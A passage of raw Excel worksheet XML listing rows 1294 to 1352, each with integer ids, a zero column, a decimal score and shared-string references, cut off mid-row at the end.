      <c r="A1294" s="1">
        <v>1292</v>
      </c>
      <c r="B1294">
        <v>2967</v>
      </c>
      <c r="C1294">
        <v>2967</v>
      </c>
      <c r="D1294">
        <v>0</v>
      </c>
      <c r="E1294">
        <v>0.80909997224807739</v>
      </c>
      <c r="F1294" t="s">
        <v>7</v>
      </c>
      <c r="G1294" t="s">
        <v>2555</v>
      </c>
      <c r="H1294" t="s">
        <v>2556</v>
      </c>
    </row>
    <row r="1295" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1295" s="1">
        <v>1293</v>
      </c>
      <c r="B1295">
        <v>7319</v>
      </c>
      <c r="C1295">
        <v>7319</v>
      </c>
      <c r="D1295">
        <v>0</v>
      </c>
      <c r="E1295">
        <v>0.87989997863769531</v>
      </c>
      <c r="F1295" t="s">
        <v>7</v>
      </c>
      <c r="G1295" t="s">
        <v>2557</v>
      </c>
      <c r="H1295" t="s">
        <v>2558</v>
      </c>
    </row>
    <row r="1296" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1296" s="1">
        <v>1294</v>
      </c>
      <c r="B1296">
        <v>3659</v>
      </c>
      <c r="C1296">
        <v>3659</v>
      </c>
      <c r="D1296">
        <v>0</v>
      </c>
      <c r="E1296">
        <v>0.57580000162124634</v>
      </c>
      <c r="F1296" t="s">
        <v>7</v>
      </c>
      <c r="G1296" t="s">
        <v>2559</v>
      </c>
      <c r="H1296" t="s">
        <v>2560</v>
      </c>
    </row>
    <row r="1297" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1297" s="1">
        <v>1295</v>
      </c>
      <c r="B1297">
        <v>5161</v>
      </c>
      <c r="C1297">
        <v>5161</v>
      </c>
      <c r="D1297">
        <v>0</v>
      </c>
      <c r="E1297">
        <v>0.99229997396469116</v>
      </c>
      <c r="F1297" t="s">
        <v>7</v>
      </c>
      <c r="G1297" t="s">
        <v>2561</v>
      </c>
      <c r="H1297" t="s">
        <v>2562</v>
      </c>
    </row>
    <row r="1298" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1298" s="1">
        <v>1296</v>
      </c>
      <c r="B1298">
        <v>5067</v>
      </c>
      <c r="C1298">
        <v>5067</v>
      </c>
      <c r="D1298">
        <v>0</v>
      </c>
      <c r="E1298">
        <v>0.80409997701644897</v>
      </c>
      <c r="F1298" t="s">
        <v>7</v>
      </c>
      <c r="G1298" t="s">
        <v>2563</v>
      </c>
      <c r="H1298" t="s">
        <v>2564</v>
      </c>
    </row>
    <row r="1299" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1299" s="1">
        <v>1297</v>
      </c>
      <c r="B1299">
        <v>549</v>
      </c>
      <c r="C1299">
        <v>549</v>
      </c>
      <c r="D1299">
        <v>0</v>
      </c>
      <c r="E1299">
        <v>0.99360001087188721</v>
      </c>
      <c r="F1299" t="s">
        <v>7</v>
      </c>
      <c r="G1299" t="s">
        <v>2565</v>
      </c>
      <c r="H1299" t="s">
        <v>2566</v>
      </c>
    </row>
    <row r="1300" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1300" s="1">
        <v>1298</v>
      </c>
      <c r="B1300">
        <v>5286</v>
      </c>
      <c r="C1300">
        <v>5286</v>
      </c>
      <c r="D1300">
        <v>0</v>
      </c>
      <c r="E1300">
        <v>0.70340001583099365</v>
      </c>
      <c r="F1300" t="s">
        <v>7</v>
      </c>
      <c r="G1300" t="s">
        <v>2567</v>
      </c>
      <c r="H1300" t="s">
        <v>2568</v>
      </c>
    </row>
    <row r="1301" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1301" s="1">
        <v>1299</v>
      </c>
      <c r="B1301">
        <v>924</v>
      </c>
      <c r="C1301">
        <v>924</v>
      </c>
      <c r="D1301">
        <v>0</v>
      </c>
      <c r="E1301">
        <v>0.99580001831054688</v>
      </c>
      <c r="F1301" t="s">
        <v>7</v>
      </c>
      <c r="G1301" t="s">
        <v>2569</v>
      </c>
      <c r="H1301" t="s">
        <v>2570</v>
      </c>
    </row>
    <row r="1302" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1302" s="1">
        <v>1300</v>
      </c>
      <c r="B1302">
        <v>923</v>
      </c>
      <c r="C1302">
        <v>923</v>
      </c>
      <c r="D1302">
        <v>0</v>
      </c>
      <c r="E1302">
        <v>0.80540001392364502</v>
      </c>
      <c r="F1302" t="s">
        <v>7</v>
      </c>
      <c r="G1302" t="s">
        <v>2571</v>
      </c>
      <c r="H1302" t="s">
        <v>2572</v>
      </c>
    </row>
    <row r="1303" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1303" s="1">
        <v>1301</v>
      </c>
      <c r="B1303">
        <v>5426</v>
      </c>
      <c r="C1303">
        <v>5426</v>
      </c>
      <c r="D1303">
        <v>0</v>
      </c>
      <c r="E1303">
        <v>0.99889999628067017</v>
      </c>
      <c r="F1303" t="s">
        <v>7</v>
      </c>
      <c r="G1303" t="s">
        <v>2573</v>
      </c>
      <c r="H1303" t="s">
        <v>2574</v>
      </c>
    </row>
    <row r="1304" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1304" s="1">
        <v>1302</v>
      </c>
      <c r="B1304">
        <v>5282</v>
      </c>
      <c r="C1304">
        <v>5282</v>
      </c>
      <c r="D1304">
        <v>0</v>
      </c>
      <c r="E1304">
        <v>0.58249998092651367</v>
      </c>
      <c r="F1304" t="s">
        <v>7</v>
      </c>
      <c r="G1304" t="s">
        <v>2575</v>
      </c>
      <c r="H1304" t="s">
        <v>2576</v>
      </c>
    </row>
    <row r="1305" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1305" s="1">
        <v>1303</v>
      </c>
      <c r="B1305">
        <v>556</v>
      </c>
      <c r="C1305">
        <v>556</v>
      </c>
      <c r="D1305">
        <v>0</v>
      </c>
      <c r="E1305">
        <v>0.38089999556541437</v>
      </c>
      <c r="F1305" t="s">
        <v>7</v>
      </c>
      <c r="G1305" t="s">
        <v>2577</v>
      </c>
      <c r="H1305" t="s">
        <v>2578</v>
      </c>
    </row>
    <row r="1306" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1306" s="1">
        <v>1304</v>
      </c>
      <c r="B1306">
        <v>5793</v>
      </c>
      <c r="C1306">
        <v>5793</v>
      </c>
      <c r="D1306">
        <v>0</v>
      </c>
      <c r="E1306">
        <v>0.86119997501373291</v>
      </c>
      <c r="F1306" t="s">
        <v>7</v>
      </c>
      <c r="G1306" t="s">
        <v>2579</v>
      </c>
      <c r="H1306" t="s">
        <v>2580</v>
      </c>
    </row>
    <row r="1307" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1307" s="1">
        <v>1305</v>
      </c>
      <c r="B1307">
        <v>7680</v>
      </c>
      <c r="C1307">
        <v>7680</v>
      </c>
      <c r="D1307">
        <v>0</v>
      </c>
      <c r="E1307">
        <v>0.99489998817443848</v>
      </c>
      <c r="F1307" t="s">
        <v>7</v>
      </c>
      <c r="G1307" t="s">
        <v>2581</v>
      </c>
      <c r="H1307" t="s">
        <v>2582</v>
      </c>
    </row>
    <row r="1308" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1308" s="1">
        <v>1306</v>
      </c>
      <c r="B1308">
        <v>7801</v>
      </c>
      <c r="C1308">
        <v>7801</v>
      </c>
      <c r="D1308">
        <v>0</v>
      </c>
      <c r="E1308">
        <v>0.6689000129699707</v>
      </c>
      <c r="F1308" t="s">
        <v>7</v>
      </c>
      <c r="G1308" t="s">
        <v>2583</v>
      </c>
      <c r="H1308" t="s">
        <v>2584</v>
      </c>
    </row>
    <row r="1309" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1309" s="1">
        <v>1307</v>
      </c>
      <c r="B1309">
        <v>123</v>
      </c>
      <c r="C1309">
        <v>123</v>
      </c>
      <c r="D1309">
        <v>0</v>
      </c>
      <c r="E1309">
        <v>0.56349998712539673</v>
      </c>
      <c r="F1309" t="s">
        <v>7</v>
      </c>
      <c r="G1309" t="s">
        <v>2585</v>
      </c>
      <c r="H1309" t="s">
        <v>2586</v>
      </c>
    </row>
    <row r="1310" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1310" s="1">
        <v>1308</v>
      </c>
      <c r="B1310">
        <v>5081</v>
      </c>
      <c r="C1310">
        <v>5081</v>
      </c>
      <c r="D1310">
        <v>0</v>
      </c>
      <c r="E1310">
        <v>0.60939997434616089</v>
      </c>
      <c r="F1310" t="s">
        <v>7</v>
      </c>
      <c r="G1310" t="s">
        <v>2587</v>
      </c>
      <c r="H1310" t="s">
        <v>2588</v>
      </c>
    </row>
    <row r="1311" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1311" s="1">
        <v>1309</v>
      </c>
      <c r="B1311">
        <v>7803</v>
      </c>
      <c r="C1311">
        <v>7803</v>
      </c>
      <c r="D1311">
        <v>0</v>
      </c>
      <c r="E1311">
        <v>0.99580001831054688</v>
      </c>
      <c r="F1311" t="s">
        <v>7</v>
      </c>
      <c r="G1311" t="s">
        <v>2589</v>
      </c>
      <c r="H1311" t="s">
        <v>2590</v>
      </c>
    </row>
    <row r="1312" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1312" s="1">
        <v>1310</v>
      </c>
      <c r="B1312">
        <v>911</v>
      </c>
      <c r="C1312">
        <v>911</v>
      </c>
      <c r="D1312">
        <v>0</v>
      </c>
      <c r="E1312">
        <v>0.99580001831054688</v>
      </c>
      <c r="F1312" t="s">
        <v>7</v>
      </c>
      <c r="G1312" t="s">
        <v>2591</v>
      </c>
      <c r="H1312" t="s">
        <v>2592</v>
      </c>
    </row>
    <row r="1313" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1313" s="1">
        <v>1311</v>
      </c>
      <c r="B1313">
        <v>910</v>
      </c>
      <c r="C1313">
        <v>910</v>
      </c>
      <c r="D1313">
        <v>0</v>
      </c>
      <c r="E1313">
        <v>0.99510002136230469</v>
      </c>
      <c r="F1313" t="s">
        <v>7</v>
      </c>
      <c r="G1313" t="s">
        <v>2593</v>
      </c>
      <c r="H1313" t="s">
        <v>2594</v>
      </c>
    </row>
    <row r="1314" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1314" s="1">
        <v>1312</v>
      </c>
      <c r="B1314">
        <v>124</v>
      </c>
      <c r="C1314">
        <v>124</v>
      </c>
      <c r="D1314">
        <v>0</v>
      </c>
      <c r="E1314">
        <v>0.71530002355575562</v>
      </c>
      <c r="F1314" t="s">
        <v>7</v>
      </c>
      <c r="G1314" t="s">
        <v>2595</v>
      </c>
      <c r="H1314" t="s">
        <v>2596</v>
      </c>
    </row>
    <row r="1315" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1315" s="1">
        <v>1313</v>
      </c>
      <c r="B1315">
        <v>125</v>
      </c>
      <c r="C1315">
        <v>125</v>
      </c>
      <c r="D1315">
        <v>0</v>
      </c>
      <c r="E1315">
        <v>0.77029997110366821</v>
      </c>
      <c r="F1315" t="s">
        <v>7</v>
      </c>
      <c r="G1315" t="s">
        <v>2597</v>
      </c>
      <c r="H1315" t="s">
        <v>2598</v>
      </c>
    </row>
    <row r="1316" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1316" s="1">
        <v>1314</v>
      </c>
      <c r="B1316">
        <v>126</v>
      </c>
      <c r="C1316">
        <v>126</v>
      </c>
      <c r="D1316">
        <v>0</v>
      </c>
      <c r="E1316">
        <v>0.92239999771118164</v>
      </c>
      <c r="F1316" t="s">
        <v>7</v>
      </c>
      <c r="G1316" t="s">
        <v>2599</v>
      </c>
      <c r="H1316" t="s">
        <v>2600</v>
      </c>
    </row>
    <row r="1317" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1317" s="1">
        <v>1315</v>
      </c>
      <c r="B1317">
        <v>907</v>
      </c>
      <c r="C1317">
        <v>907</v>
      </c>
      <c r="D1317">
        <v>0</v>
      </c>
      <c r="E1317">
        <v>0.99889999628067017</v>
      </c>
      <c r="F1317" t="s">
        <v>7</v>
      </c>
      <c r="G1317" t="s">
        <v>2601</v>
      </c>
      <c r="H1317" t="s">
        <v>2602</v>
      </c>
    </row>
    <row r="1318" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1318" s="1">
        <v>1316</v>
      </c>
      <c r="B1318">
        <v>127</v>
      </c>
      <c r="C1318">
        <v>127</v>
      </c>
      <c r="D1318">
        <v>0</v>
      </c>
      <c r="E1318">
        <v>0.99599999189376831</v>
      </c>
      <c r="F1318" t="s">
        <v>7</v>
      </c>
      <c r="G1318" t="s">
        <v>2603</v>
      </c>
      <c r="H1318" t="s">
        <v>2604</v>
      </c>
    </row>
    <row r="1319" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1319" s="1">
        <v>1317</v>
      </c>
      <c r="B1319">
        <v>5066</v>
      </c>
      <c r="C1319">
        <v>5066</v>
      </c>
      <c r="D1319">
        <v>0</v>
      </c>
      <c r="E1319">
        <v>0.59219998121261597</v>
      </c>
      <c r="F1319" t="s">
        <v>7</v>
      </c>
      <c r="G1319" t="s">
        <v>2605</v>
      </c>
      <c r="H1319" t="s">
        <v>2606</v>
      </c>
    </row>
    <row r="1320" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1320" s="1">
        <v>1318</v>
      </c>
      <c r="B1320">
        <v>5425</v>
      </c>
      <c r="C1320">
        <v>5425</v>
      </c>
      <c r="D1320">
        <v>0</v>
      </c>
      <c r="E1320">
        <v>0.85530000925064087</v>
      </c>
      <c r="F1320" t="s">
        <v>7</v>
      </c>
      <c r="G1320" t="s">
        <v>2607</v>
      </c>
      <c r="H1320" t="s">
        <v>2608</v>
      </c>
    </row>
    <row r="1321" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1321" s="1">
        <v>1319</v>
      </c>
      <c r="B1321">
        <v>5065</v>
      </c>
      <c r="C1321">
        <v>5065</v>
      </c>
      <c r="D1321">
        <v>0</v>
      </c>
      <c r="E1321">
        <v>0.6119999885559082</v>
      </c>
      <c r="F1321" t="s">
        <v>7</v>
      </c>
      <c r="G1321" t="s">
        <v>2609</v>
      </c>
      <c r="H1321" t="s">
        <v>2610</v>
      </c>
    </row>
    <row r="1322" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1322" s="1">
        <v>1320</v>
      </c>
      <c r="B1322">
        <v>547</v>
      </c>
      <c r="C1322">
        <v>547</v>
      </c>
      <c r="D1322">
        <v>0</v>
      </c>
      <c r="E1322">
        <v>0.9966999888420105</v>
      </c>
      <c r="F1322" t="s">
        <v>7</v>
      </c>
      <c r="G1322" t="s">
        <v>2611</v>
      </c>
      <c r="H1322" t="s">
        <v>2612</v>
      </c>
    </row>
    <row r="1323" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1323" s="1">
        <v>1321</v>
      </c>
      <c r="B1323">
        <v>5052</v>
      </c>
      <c r="C1323">
        <v>5052</v>
      </c>
      <c r="D1323">
        <v>0</v>
      </c>
      <c r="E1323">
        <v>0.79199999570846558</v>
      </c>
      <c r="F1323" t="s">
        <v>7</v>
      </c>
      <c r="G1323" t="s">
        <v>2613</v>
      </c>
      <c r="H1323" t="s">
        <v>2614</v>
      </c>
    </row>
    <row r="1324" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1324" s="1">
        <v>1322</v>
      </c>
      <c r="B1324">
        <v>5597</v>
      </c>
      <c r="C1324">
        <v>5597</v>
      </c>
      <c r="D1324">
        <v>0</v>
      </c>
      <c r="E1324">
        <v>0.99949997663497925</v>
      </c>
      <c r="F1324" t="s">
        <v>7</v>
      </c>
      <c r="G1324" t="s">
        <v>2615</v>
      </c>
      <c r="H1324" t="s">
        <v>2616</v>
      </c>
    </row>
    <row r="1325" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1325" s="1">
        <v>1323</v>
      </c>
      <c r="B1325">
        <v>948</v>
      </c>
      <c r="C1325">
        <v>948</v>
      </c>
      <c r="D1325">
        <v>0</v>
      </c>
      <c r="E1325">
        <v>0.98470002412796021</v>
      </c>
      <c r="F1325" t="s">
        <v>7</v>
      </c>
      <c r="G1325" t="s">
        <v>2617</v>
      </c>
      <c r="H1325" t="s">
        <v>2618</v>
      </c>
    </row>
    <row r="1326" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1326" s="1">
        <v>1324</v>
      </c>
      <c r="B1326">
        <v>7490</v>
      </c>
      <c r="C1326">
        <v>7490</v>
      </c>
      <c r="D1326">
        <v>0</v>
      </c>
      <c r="E1326">
        <v>0.84289997816085815</v>
      </c>
      <c r="F1326" t="s">
        <v>7</v>
      </c>
      <c r="G1326" t="s">
        <v>2619</v>
      </c>
      <c r="H1326" t="s">
        <v>2620</v>
      </c>
    </row>
    <row r="1327" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1327" s="1">
        <v>1325</v>
      </c>
      <c r="B1327">
        <v>112</v>
      </c>
      <c r="C1327">
        <v>112</v>
      </c>
      <c r="D1327">
        <v>0</v>
      </c>
      <c r="E1327">
        <v>0.67680001258850098</v>
      </c>
      <c r="F1327" t="s">
        <v>7</v>
      </c>
      <c r="G1327" t="s">
        <v>2621</v>
      </c>
      <c r="H1327" t="s">
        <v>1085</v>
      </c>
    </row>
    <row r="1328" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1328" s="1">
        <v>1326</v>
      </c>
      <c r="B1328">
        <v>5054</v>
      </c>
      <c r="C1328">
        <v>5054</v>
      </c>
      <c r="D1328">
        <v>0</v>
      </c>
      <c r="E1328">
        <v>0.87550002336502075</v>
      </c>
      <c r="F1328" t="s">
        <v>7</v>
      </c>
      <c r="G1328" t="s">
        <v>2622</v>
      </c>
      <c r="H1328" t="s">
        <v>2623</v>
      </c>
    </row>
    <row r="1329" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1329" s="1">
        <v>1327</v>
      </c>
      <c r="B1329">
        <v>5055</v>
      </c>
      <c r="C1329">
        <v>5055</v>
      </c>
      <c r="D1329">
        <v>0</v>
      </c>
      <c r="E1329">
        <v>0.99169999361038208</v>
      </c>
      <c r="F1329" t="s">
        <v>7</v>
      </c>
      <c r="G1329" t="s">
        <v>2624</v>
      </c>
      <c r="H1329" t="s">
        <v>2625</v>
      </c>
    </row>
    <row r="1330" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1330" s="1">
        <v>1328</v>
      </c>
      <c r="B1330">
        <v>5515</v>
      </c>
      <c r="C1330">
        <v>5515</v>
      </c>
      <c r="D1330">
        <v>0</v>
      </c>
      <c r="E1330">
        <v>0.79479998350143433</v>
      </c>
      <c r="F1330" t="s">
        <v>7</v>
      </c>
      <c r="G1330" t="s">
        <v>2626</v>
      </c>
      <c r="H1330" t="s">
        <v>2627</v>
      </c>
    </row>
    <row r="1331" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1331" s="1">
        <v>1329</v>
      </c>
      <c r="B1331">
        <v>5289</v>
      </c>
      <c r="C1331">
        <v>5289</v>
      </c>
      <c r="D1331">
        <v>0</v>
      </c>
      <c r="E1331">
        <v>0.69010001420974731</v>
      </c>
      <c r="F1331" t="s">
        <v>7</v>
      </c>
      <c r="G1331" t="s">
        <v>2628</v>
      </c>
      <c r="H1331" t="s">
        <v>2629</v>
      </c>
    </row>
    <row r="1332" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1332" s="1">
        <v>1330</v>
      </c>
      <c r="B1332">
        <v>7493</v>
      </c>
      <c r="C1332">
        <v>7493</v>
      </c>
      <c r="D1332">
        <v>0</v>
      </c>
      <c r="E1332">
        <v>0.66420000791549683</v>
      </c>
      <c r="F1332" t="s">
        <v>7</v>
      </c>
      <c r="G1332" t="s">
        <v>2630</v>
      </c>
      <c r="H1332" t="s">
        <v>2631</v>
      </c>
    </row>
    <row r="1333" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1333" s="1">
        <v>1331</v>
      </c>
      <c r="B1333">
        <v>5085</v>
      </c>
      <c r="C1333">
        <v>5085</v>
      </c>
      <c r="D1333">
        <v>0</v>
      </c>
      <c r="E1333">
        <v>0.63919997215270996</v>
      </c>
      <c r="F1333" t="s">
        <v>7</v>
      </c>
      <c r="G1333" t="s">
        <v>2632</v>
      </c>
      <c r="H1333" t="s">
        <v>2633</v>
      </c>
    </row>
    <row r="1334" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1334" s="1">
        <v>1332</v>
      </c>
      <c r="B1334">
        <v>7871</v>
      </c>
      <c r="C1334">
        <v>7871</v>
      </c>
      <c r="D1334">
        <v>0</v>
      </c>
      <c r="E1334">
        <v>0.39259999990463262</v>
      </c>
      <c r="F1334" t="s">
        <v>7</v>
      </c>
      <c r="G1334" t="s">
        <v>2634</v>
      </c>
      <c r="H1334" t="s">
        <v>2635</v>
      </c>
    </row>
    <row r="1335" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1335" s="1">
        <v>1333</v>
      </c>
      <c r="B1335">
        <v>939</v>
      </c>
      <c r="C1335">
        <v>939</v>
      </c>
      <c r="D1335">
        <v>0</v>
      </c>
      <c r="E1335">
        <v>0.99180001020431519</v>
      </c>
      <c r="F1335" t="s">
        <v>7</v>
      </c>
      <c r="G1335" t="s">
        <v>2636</v>
      </c>
      <c r="H1335" t="s">
        <v>2637</v>
      </c>
    </row>
    <row r="1336" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1336" s="1">
        <v>1334</v>
      </c>
      <c r="B1336">
        <v>7794</v>
      </c>
      <c r="C1336">
        <v>7794</v>
      </c>
      <c r="D1336">
        <v>0</v>
      </c>
      <c r="E1336">
        <v>0.90920001268386841</v>
      </c>
      <c r="F1336" t="s">
        <v>7</v>
      </c>
      <c r="G1336" t="s">
        <v>2638</v>
      </c>
      <c r="H1336" t="s">
        <v>2639</v>
      </c>
    </row>
    <row r="1337" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1337" s="1">
        <v>1335</v>
      </c>
      <c r="B1337">
        <v>295</v>
      </c>
      <c r="C1337">
        <v>295</v>
      </c>
      <c r="D1337">
        <v>0</v>
      </c>
      <c r="E1337">
        <v>0.84189999103546143</v>
      </c>
      <c r="F1337" t="s">
        <v>7</v>
      </c>
      <c r="G1337" t="s">
        <v>2640</v>
      </c>
      <c r="H1337" t="s">
        <v>2641</v>
      </c>
    </row>
    <row r="1338" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1338" s="1">
        <v>1336</v>
      </c>
      <c r="B1338">
        <v>7795</v>
      </c>
      <c r="C1338">
        <v>7795</v>
      </c>
      <c r="D1338">
        <v>0</v>
      </c>
      <c r="E1338">
        <v>0.5997999906539917</v>
      </c>
      <c r="F1338" t="s">
        <v>7</v>
      </c>
      <c r="G1338" t="s">
        <v>2642</v>
      </c>
      <c r="H1338" t="s">
        <v>2643</v>
      </c>
    </row>
    <row r="1339" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1339" s="1">
        <v>1337</v>
      </c>
      <c r="B1339">
        <v>5060</v>
      </c>
      <c r="C1339">
        <v>5060</v>
      </c>
      <c r="D1339">
        <v>0</v>
      </c>
      <c r="E1339">
        <v>0.43849998712539667</v>
      </c>
      <c r="F1339" t="s">
        <v>7</v>
      </c>
      <c r="G1339" t="s">
        <v>2644</v>
      </c>
      <c r="H1339" t="s">
        <v>2645</v>
      </c>
    </row>
    <row r="1340" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1340" s="1">
        <v>1338</v>
      </c>
      <c r="B1340">
        <v>936</v>
      </c>
      <c r="C1340">
        <v>936</v>
      </c>
      <c r="D1340">
        <v>0</v>
      </c>
      <c r="E1340">
        <v>0.64579999446868896</v>
      </c>
      <c r="F1340" t="s">
        <v>7</v>
      </c>
      <c r="G1340" t="s">
        <v>2646</v>
      </c>
      <c r="H1340" t="s">
        <v>2647</v>
      </c>
    </row>
    <row r="1341" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1341" s="1">
        <v>1339</v>
      </c>
      <c r="B1341">
        <v>933</v>
      </c>
      <c r="C1341">
        <v>933</v>
      </c>
      <c r="D1341">
        <v>0</v>
      </c>
      <c r="E1341">
        <v>0.99750000238418579</v>
      </c>
      <c r="F1341" t="s">
        <v>7</v>
      </c>
      <c r="G1341" t="s">
        <v>2648</v>
      </c>
      <c r="H1341" t="s">
        <v>2649</v>
      </c>
    </row>
    <row r="1342" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1342" s="1">
        <v>1340</v>
      </c>
      <c r="B1342">
        <v>5797</v>
      </c>
      <c r="C1342">
        <v>5797</v>
      </c>
      <c r="D1342">
        <v>0</v>
      </c>
      <c r="E1342">
        <v>0.90179997682571411</v>
      </c>
      <c r="F1342" t="s">
        <v>7</v>
      </c>
      <c r="G1342" t="s">
        <v>2650</v>
      </c>
      <c r="H1342" t="s">
        <v>2651</v>
      </c>
    </row>
    <row r="1343" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1343" s="1">
        <v>1341</v>
      </c>
      <c r="B1343">
        <v>5423</v>
      </c>
      <c r="C1343">
        <v>5423</v>
      </c>
      <c r="D1343">
        <v>0</v>
      </c>
      <c r="E1343">
        <v>0.99900001287460327</v>
      </c>
      <c r="F1343" t="s">
        <v>7</v>
      </c>
      <c r="G1343" t="s">
        <v>2652</v>
      </c>
      <c r="H1343" t="s">
        <v>2653</v>
      </c>
    </row>
    <row r="1344" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1344" s="1">
        <v>1342</v>
      </c>
      <c r="B1344">
        <v>118</v>
      </c>
      <c r="C1344">
        <v>118</v>
      </c>
      <c r="D1344">
        <v>0</v>
      </c>
      <c r="E1344">
        <v>0.47620001435279852</v>
      </c>
      <c r="F1344" t="s">
        <v>7</v>
      </c>
      <c r="G1344" t="s">
        <v>2654</v>
      </c>
      <c r="H1344" t="s">
        <v>2655</v>
      </c>
    </row>
    <row r="1345" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1345" s="1">
        <v>1343</v>
      </c>
      <c r="B1345">
        <v>545</v>
      </c>
      <c r="C1345">
        <v>545</v>
      </c>
      <c r="D1345">
        <v>0</v>
      </c>
      <c r="E1345">
        <v>0.64170002937316895</v>
      </c>
      <c r="F1345" t="s">
        <v>7</v>
      </c>
      <c r="G1345" t="s">
        <v>2656</v>
      </c>
      <c r="H1345" t="s">
        <v>2657</v>
      </c>
    </row>
    <row r="1346" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1346" s="1">
        <v>1344</v>
      </c>
      <c r="B1346">
        <v>952</v>
      </c>
      <c r="C1346">
        <v>952</v>
      </c>
      <c r="D1346">
        <v>0</v>
      </c>
      <c r="E1346">
        <v>0.94010001420974731</v>
      </c>
      <c r="F1346" t="s">
        <v>7</v>
      </c>
      <c r="G1346" t="s">
        <v>2658</v>
      </c>
      <c r="H1346" t="s">
        <v>2659</v>
      </c>
    </row>
    <row r="1347" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1347" s="1">
        <v>1345</v>
      </c>
      <c r="B1347">
        <v>904</v>
      </c>
      <c r="C1347">
        <v>904</v>
      </c>
      <c r="D1347">
        <v>0</v>
      </c>
      <c r="E1347">
        <v>0.53030002117156982</v>
      </c>
      <c r="F1347" t="s">
        <v>7</v>
      </c>
      <c r="G1347" t="s">
        <v>2660</v>
      </c>
      <c r="H1347" t="s">
        <v>2661</v>
      </c>
    </row>
    <row r="1348" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1348" s="1">
        <v>1346</v>
      </c>
      <c r="B1348">
        <v>562</v>
      </c>
      <c r="C1348">
        <v>562</v>
      </c>
      <c r="D1348">
        <v>0</v>
      </c>
      <c r="E1348">
        <v>0.7850000262260437</v>
      </c>
      <c r="F1348" t="s">
        <v>7</v>
      </c>
      <c r="G1348" t="s">
        <v>2662</v>
      </c>
      <c r="H1348" t="s">
        <v>2663</v>
      </c>
    </row>
    <row r="1349" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1349" s="1">
        <v>1347</v>
      </c>
      <c r="B1349">
        <v>139</v>
      </c>
      <c r="C1349">
        <v>139</v>
      </c>
      <c r="D1349">
        <v>0</v>
      </c>
      <c r="E1349">
        <v>0.89149999618530273</v>
      </c>
      <c r="F1349" t="s">
        <v>7</v>
      </c>
      <c r="G1349" t="s">
        <v>2664</v>
      </c>
      <c r="H1349" t="s">
        <v>2665</v>
      </c>
    </row>
    <row r="1350" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1350" s="1">
        <v>1348</v>
      </c>
      <c r="B1350">
        <v>576</v>
      </c>
      <c r="C1350">
        <v>576</v>
      </c>
      <c r="D1350">
        <v>0</v>
      </c>
      <c r="E1350">
        <v>0.67710000276565552</v>
      </c>
      <c r="F1350" t="s">
        <v>7</v>
      </c>
      <c r="G1350" t="s">
        <v>2666</v>
      </c>
      <c r="H1350" t="s">
        <v>2667</v>
      </c>
    </row>
    <row r="1351" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1351" s="1">
        <v>1349</v>
      </c>
      <c r="B1351">
        <v>881</v>
      </c>
      <c r="C1351">
        <v>881</v>
      </c>
      <c r="D1351">
        <v>0</v>
      </c>
      <c r="E1351">
        <v>0.98989999294281006</v>
      </c>
      <c r="F1351" t="s">
        <v>7</v>
      </c>
      <c r="G1351" t="s">
        <v>2668</v>
      </c>
      <c r="H1351" t="s">
        <v>2669</v>
      </c>
    </row>
    <row r="1352" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1352" s="1">
        <v>1350</v>
      </c>
      <c r="B1352">
        <v>140</v>
      </c>
      <c r="C1352">
        <v>140</v>
      </c>
      <c r="D1352">
        <v>0</v>
      </c>
      <c r="E1352">
        <v>0.86299997568130493</v>
      </c>
      <c r="F1352" t="s">
        <v>7</v>
      </c>
      <c r="G1352" t="s">
        <v>2670</v>
      </c>
      <c r="H1352" t="s">
